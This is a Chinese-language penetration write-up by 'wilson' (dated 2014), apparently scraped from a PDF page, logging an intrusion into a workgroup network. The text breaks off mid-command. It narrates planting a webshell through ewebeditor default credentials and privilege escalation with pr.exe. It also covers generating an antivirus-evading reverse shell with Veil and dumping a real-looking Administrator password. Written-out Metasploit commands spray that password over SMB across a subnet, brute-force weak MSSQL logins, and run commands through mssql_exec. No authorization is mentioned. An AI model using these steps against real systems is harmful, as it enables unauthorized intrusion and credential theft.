记一次在工作组的渗透-中二的wilson.PDFVIP

记一次在工作组的渗透 作者:wilson 时间:2014.4.8 一)getwebshell Getshell直接ewebeditor 对config.asp 可编辑。 这个不是重点 我粗略一讲 ewebeditor 默认账户登入，可编辑config.asp 直接插马； 外围服务器:xxx.xxx.64.33 ======================================== 二）提权 上传 就可以执行命令了 pr.exe 提了 ======================================== 三)在工作组中的渗透 本地做了策略 我登不上去3389 关了各种策略 没有用 估计是硬防了 = =人品啊 尼玛 netstat -ano 看见很多端口 就是telnet 不上去。 后来发现整个段都是做了硬防的样子，扫不到一些重要端口。。。 算了 不登上去了 = = 直接用msf 搞吧 用veil 生成一个免杀tcp 反弹shell 的payload[ veil 免杀神器。。。] 利用Msf 进行渗透 连接上vpn ，就有公网ip 啦 然后 监听一个端口 我喜欢 1433 不知道为什么 = =||| 我老是监听端口时候外面连接不 上，当我监听了1433 就可以连接上了。。。所以我常常选择这个端口。。。 进一步 收集本机的密码 1.hashdump: Administrator:sntcm33tao 2.扫描端口试试: 要加一个路由表，不加，你在外面扫扫不到什么东西的 = = 就是这样。。。。 route add xxx.xxx.64.0 session 值 因为arp 扫不了存活的主机【估计做了什么策略】 加载模块，设置测试，扫一些常见端口。。。 扫的数据 被存在了数据库里面了！！ 我们可以通过hosts 和services 命令来访问 3.开始漏洞测试 445 端口 msf 溢出还没打 好耗时间。。偷个懒好了 呵呵 - -||| 尝试SBM 登入:加入自己在那个服务器上抓的密码:sntcm33tao msf use auxiliary/scanner/smb/smb_login msf auxiliary(smb_login) set RHOSTS xxx.xxx.64.1-254 RHOST = xxx.xxx.64.1-254 msf auxiliary(smb_login) set SMBPass sntcm33tao SMBPass =sntcm33tao msf auxiliary(smb_login) set SMBUser administrator SMBUser = administrator msf auxiliary(smb_login) exploit 尼玛 结果发现自己服务器密码没有用上 - - 唉 伤心 - - 1433 端口 用service -p 端口 -R 导出结果到文件中 注意这个是自动加载到你现在使用对应的模块的！ 进行myssql 弱口令爆破 尼玛走运了。。。有三个弱口令 哈哈哈~~~ 很好 心里暗喜，估计着这个段的管理员 认为做了硬防就出现空口令的这种失误了 呵呵，这个突破点要好好利用 好，接下来看看怎么利用这个漏洞 三个方法。。 一)反弹一个shell [-] Exploit failed: EOFError EOFError 我擦 失败了 xxx.xxx.64.24 是不是有杀软?? = =?? 尼玛。。。。。。。。 算了 我先看看xxx.xxx.64.55 可以么？ [-] Exploit failed: EOFError EOFErrorr 我擦 居然也是不行。。 好吧，看看能不能用bind_tcp 试试 set PAYLOAD windows/meterpreter/bind_tcp 不行 0 0 法克 = =||| 二)好吧 换思路 - -执行命令 use admin/mssql/mssql_exec 执行命令好了 - - set RHOST = xxx.xxx.64.24 msf auxiliary(mssql_exec) set CMD cmd.exe /c net user CMD = cmd.exe /c net user msf auxili